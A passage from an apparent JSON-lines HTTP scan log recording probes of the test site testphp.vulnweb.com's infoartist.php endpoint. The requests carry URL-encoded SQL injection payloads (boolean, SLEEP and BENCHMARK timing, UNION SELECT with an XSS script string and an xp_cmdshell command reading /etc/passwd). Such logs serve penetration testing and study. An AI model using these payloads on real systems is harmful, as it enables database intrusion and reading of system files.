port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27qQrErS%3C%27%22%3EqhDCPc\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27qQrErS%3C%27%22%3EqhDCPc\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%27qQrErS%3C%27%22%3EqhDCPc\",\"time\":\"348.796814ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:36.978559804Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27vlAIso%3C%27%22%3EYETIxV\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%27vlAIso%3C%27%22%3EYETIxV\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%27vlAIso%3C%27%22%3EYETIxV\",\"time\":\"340.557552ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:37.01160661Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%201574%3D7678%20AND%20%286072%3D6072\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%201574%3D7678%20AND%20%286072%3D6072\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%20AND%201574%3D7678%20AND%20%286072%3D6072\",\"time\":\"346.007574ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:37.061958344Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%203090%3D2235%20AND%20%285770%3D5770\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%203090%3D2235%20AND%20%285770%3D5770\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%20AND%203090%3D2235%20AND%20%285770%3D5770\",\"time\":\"353.472581ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:37.265339192Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%205301%3D3094%20AND%20%286102%3D6102\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%205301%3D3094%20AND%20%286102%3D6102\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%20AND%205301%3D3094%20AND%20%286102%3D6102\",\"time\":\"349.05439ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:37.330736375Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%209129%3D9129%20AND%20%283485%3D3485\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%209129%3D9129%20AND%20%283485%3D3485\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%20AND%209129%3D9129%20AND%20%283485%3D3485\",\"time\":\"344.576634ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:37.333728767Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%206311%3D6311%20AND%20%288184%3D8184\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%20AND%206311%3D6311%20AND%20%288184%3D8184\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%20AND%206311%3D6311%20AND%20%288184%3D8184\",\"time\":\"351.33465ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:37.380032253Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%20AND%203372%3D8686%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%20AND%203372%3D8686%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%29%20AND%203372%3D8686%23\",\"time\":\"347.464366ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:37.55352815Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%20AND%205413%3D5413%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%20AND%205413%3D5413%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%29%20AND%205413%3D5413%23\",\"time\":\"354.8735ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:40.842539498Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%29%20AND%202555%3D2931%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%29%20AND%202555%3D2931%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%29%29%20AND%202555%3D2931%23\",\"time\":\"356.927421ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:40.952401194Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%29%20AND%205413%3D5413%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%29%29%29%20AND%205413%3D5413%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%29%29%29%20AND%205413%3D5413%23\",\"time\":\"343.578273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:41.017415138Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%2C%2C%2C%29%28%22%27%2C%29%28\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%2C%2C%2C%29%28%22%27%2C%29%28\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%2C%2C%2C%29%28%22%27%2C%29%28\",\"time\":\"362.961717ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:41.042025161Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GchC%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GchC%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GchC%29%23\",\"time\":\"341.769777ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:41.789842005Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZVkT%29--%20FVMS\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZVkT%29--%20FVMS\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZVkT%29--%20FVMS\",\"time\":\"344.157981ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:41.799415477Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x41764c4a%29%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x41764c4a%29%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x41764c4a%29%29%23\",\"time\":\"351.056895ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:41.79978206Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x474d6678%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x474d6678%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x474d6678%29%29\",\"time\":\"349.428684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:41.817051392Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x48675a4b%29%29--%20wgZo\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x48675a4b%29%29--%20wgZo\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x48675a4b%29%29--%20wgZo\",\"time\":\"345.340492ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:42.535180871Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x66726450%29%29--%20WqjC\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x66726450%29%29--%20WqjC\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x66726450%29%29--%20WqjC\",\"time\":\"343.589751ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:45.749431905Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20SLEEP%285%29--%20TtVI\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20SLEEP%285%29--%20TtVI\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3BSELECT%20SLEEP%285%29--%20TtVI\",\"time\":\"349.597525ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:45.761205431Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20SLEEP%285%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%3BSELECT%20SLEEP%285%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%3BSELECT%20SLEEP%285%29\",\"time\":\"361.392011ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.038191278Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\\u0026DUMM=1329%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\\u0026DUMM=1329%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1\\u0026DUMM=1329%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"349.058828ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.765811807Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\\u0026YVeN=2411%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\\u0026YVeN=2411%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1\\u0026YVeN=2411%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"353.014475ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.79473832Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1.%28%29%28%2C%22..%2C%27\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1.%28%29%28%2C%22..%2C%27\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1.%28%29%28%2C%22..%2C%27\",\"time\":\"354.751373ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.795340565Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\\u0026fYij=6906%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\\u0026fYij=6906%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1\\u0026fYij=6906%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"354.4977ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.861029788Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1.%29%27%28%28%28%22.%2C.\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1.%29%27%28%28%28%22.%2C.\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1.%29%27%28%28%28%22.%2C.\",\"time\":\"357.300419ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.874597302Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1921\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1921\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1921\",\"time\":\"356.667682ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.903697146Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=3299\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=3299\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=3299\",\"time\":\"344.436863ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:46.992769837Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=8732\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=8732\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=8732\",\"time\":\"353.923309ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.151648909Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=9023\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=9023\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=9023\",\"time\":\"343.74739ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.217294409Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infotitle.php5\",\"input\":\"http://testphp.vulnweb.com/AJAX/infotitle.php5\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infotitle.php5\",\"time\":\"360.70229ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.303809926Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infotitle.php5H\",\"input\":\"http://testphp.vulnweb.com/AJAX/infotitle.php5H\",\"title\":\"404 Not 